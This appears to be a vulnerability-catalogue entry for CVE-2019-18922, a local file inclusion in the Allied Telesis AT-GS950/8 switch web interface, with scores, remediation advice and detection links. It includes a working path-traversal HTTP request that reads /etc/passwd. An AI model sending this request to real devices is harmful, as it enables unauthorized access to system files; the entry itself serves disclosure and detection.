🔙 목록으로 돌아가기

CVE-2019-18922: Allied Telesis AT-GS950/8 - Local File Inclusion

TitleAllied Telesis AT-GS950/8 - Local File Inclusion
Author0x_Akoko
SeverityHigh
ImpactSuccessful exploitation of this vulnerability allows an attacker to read arbitrary files on the affected device, leading to unauthorized access and potential data leakage.
RemediationApply the latest firmware update provided by Allied Telesis to fix the vulnerability.
CVSS Score7.5
EPSS Score0.83925
CVE IDCVE-2019-18922
CWE IDCWE-22
Tags cve cve2019 packetstorm seclists allied lfi alliedtelesis vuln

🔍 Vulnerability Description

Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface.

🌐 HTTP Request

GET /../../../../../../etc/passwd HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/59.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-18922.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-18922.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A